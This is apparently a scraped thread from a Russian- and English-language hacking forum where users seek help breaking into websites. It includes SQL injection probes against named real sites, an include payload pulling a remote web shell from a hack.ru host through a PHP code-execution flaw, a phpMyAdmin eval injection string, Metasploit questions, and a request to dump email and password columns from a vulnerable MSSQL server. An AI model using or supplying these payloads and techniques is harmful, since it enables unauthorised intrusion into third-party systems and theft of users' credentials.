Ваши вопросы по уязвимостям.

Any tutorial on ASP injection please?

I want to start learning ASP Injection.

Code:

http://www.wsstp.eu/content/default.asp?PageId=882'

Any link? Help? Anything?

 

ссори бат ви хэв ноу асп инжекшен туториал. юз гугле, плиииииииииииз.

 

lightangel
maybe first you need to learn sql-injection and then move forward?

 

I have learnt so much about SQL on PHP sites.

I just need a link or book about MsAccess.

 

http://www.fmsinc.com/microsoftaccess/query/snytax/update-query.html

 

I have a problem here guys.

Code:

http://www.expomotor-online.com/detalhesauto.php?id=71485'

Error shows it's vulnerable.

Cannot get its order by, why?

 

phpmyadmin 2.11.10 есть ли что по уязвимостям?
/scripts/setup.php есть
/config/ нет
Прошу помощи у гуру.
Заранее спасибо

 

https://rdot.org/forum/showthread.php?t=347

 

I don't know, this is a very simple injection...

(take away the spaces)

 

Yeah it is but you used a tool to get number of columns.

 

about what tool you say? this is quite easy to do by hands.

 

Видел уже, ничего не получается...

 

But it maybe a lot of table with name like admin_accounts or admin_user...in this situation you need a tool...because if you do this work by hand, you spent a lot of time

 

Причем здесь таблицы? я говорил о подборе колонок, что это можно и без программ сделать!

 

Здравствуйте. Есть сайт с возможностью выполнения произвольного php кода.
site.ru/file.php?e=phpinfo();
Подскажите как сделать инклуид шелла с удаленного сайта.
Пробовал так:

Code:

site.ru/file.php?e=@include("http://hack.ru/wso2.txt");

но не получается
Также пробовал без @ - без результата.
Подскажите что я делаю не так?

 

дайте помощь по metasploit я хочу атоковать машину на 80 порт но ни как не получается я даже не знаю к чему будет у меня домтуп помогите разобраться вот пост http://forum.antichat.ru/thread304718.html

также еще вопрос как подбирать нужные сплоиты и нагрузки вот пост
http://forum.antichat.ru/thread305294.html

 

Code:

server_databases.php?pos=0&dbstats=0&sort_by="]) OR eval($_REQUEST[cmd]); //&sort_order=desc&token=a327a405644acbcce02edb41461a58c9&cmd=phpinfo();

token=подставляю свой. 0 реакции, показывает форму логина.
эксплойт от M4g я так понимаю должен выполнять код, прописанный в файле на фтп.
Результат выполнения выдает страницу scripts/setup.php
с двумя отличиями, вверху написаны заголовки запроса, а внизу цифра 0

 

Уважаемые, нужна ваша помощь. Есть сайт. Стоит на mssql , он уязвимый. Надо сдампить базу. Проблема в том , что внутри 20 баз, в каждой по 150-200 таблиц. Хави ломает через mssql with error. Шелл залить некуда, подскажите, что в такоц ситуации можно сделать ???

 

http://forum.antichat.ru/thread43966.html
Пункты 2.2.х
вроде как...

 

Т.е. к примеру , информация нахоидтся в базе мастер, таблица аккаунтс , и 2 колонки имейл и пасс, как это вывести?? С учетом что в mssql не работает. Union функция.